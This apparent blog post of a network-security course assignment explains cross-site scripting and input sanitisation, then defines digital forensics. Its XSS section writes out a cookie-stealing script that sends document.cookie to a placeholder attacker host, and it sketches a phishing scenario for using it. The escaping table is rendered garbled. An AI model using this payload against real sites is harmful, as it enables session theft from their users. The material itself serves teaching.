Get 60 0FP0EXP Token to remove widget entirely!
Get 50 0FP0EXP Token to remove my NFTS advertisements!
Get 40 0FP0EXP Token to remove this donation notification!
get 30 0FP0EXP Token to remove this paypal donation.
get 20 0FP0EXP Token to remove my personal ADS.
word number: 726
Time: 2022-09-12 02:21:49 +0000
This is the fourteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.
XSS/CSS stands for cross site scripting which is a computer security vulnerability to inject scripts into web pages viewed by other users . What is the difference between code injection? Code injection is a server side vulnerability while XSS is a client side vulnerability, what they have in common is they are injection type attack . One of the easiest method to check for XSS vulnerability is to include a html tags into the submission form, for example on Figure 1 is an
<S> (strike-through) html tag inserted on a simple php form input (any php tutorial on the web have this tutorial) and Figure 2 is an example of using
<img src=””> tag to add an image, even worse we can input tags that could display the attacker site instead and take the victim site with
<script>document.location=”http://some_attacker/cookie.cgi?” + document.cookie
</script>. (1) Once a XSS vulnerability had been found we can send a phising email to the user of the site containing the XSS script. (2) With a good social engineering the user site can be tricked in running the code and connect to attacker’s site through the vulnerable XSS site. (3) The attacker can obtain the session ID and other informations of the victim. 
Figure 1. Checking XSS vulnerability strike through HTML tag example.
To prevent XSS we have to filter the user input. One way is to not allow html tags for, or perform sensitization allowing text formatting tag such as
<S>, and converting dangerous tags like “&→&”, “<→<”, “>→>”, “”→"”, “’→&x27”, and “/→&x2f”. For my above PHP code I can fix it by changing the output function (adding) into “echo htmlspecialchars($string, ENT_QUOTES, ‘UTF-8’)”. There are libraries available for filtering XSS if it’s difficult to make our own libraries such as “PHP AntiXSS”, “xss_clean.php filter”, “htmlpurifier”, “xssprotect”, and “XSS html filter”. 
Figure 2. Checking XSS vulnerability image HTML tag example.
Digital crime investigation is mainly used in criminal investigation in order to enhance the criminal investigation process itself. It’s more like an auxiliary to tool in which is specifically digital typed tools. For example (1) the use of surveillance camera to capture robbery incident in stores, (2) categorizing data, clustering data, plotting graph, which is under data mining, (3) using database to store crime records. On the other hand digital forensic is to extract, collect, analyze, and preserve digital evidence, for example to be shown in court. 
Figure 3. Illustration of digital forensic on hardware containing data.
Both digital crime investigation and digital forensic are part of a subject called forensic science. Performing autopsy on a dead body to find the cause of death is an example of medical forensic. Then examining a computer to search for informations of itself being attacked is an example of digital forensic. The basic step is to (1) identify the attack, its extent and damage caused, (2) identify the source of the attack, (3) record the incident. The scope of digital forensic can be computer forensic as example above, or network forensic which the larger scale with the computer forensic included into the network forensic. Unlike medical forensic we can first create a duplicate of the computer data or network data before running digital forensic which is a safe type of investigation that avoids the risk of destroying the evidence. Most popularly examined on digital forensics are maintenance of files and folders, disk logs, server logs, logs from IDS/IPS, and network packets if captured.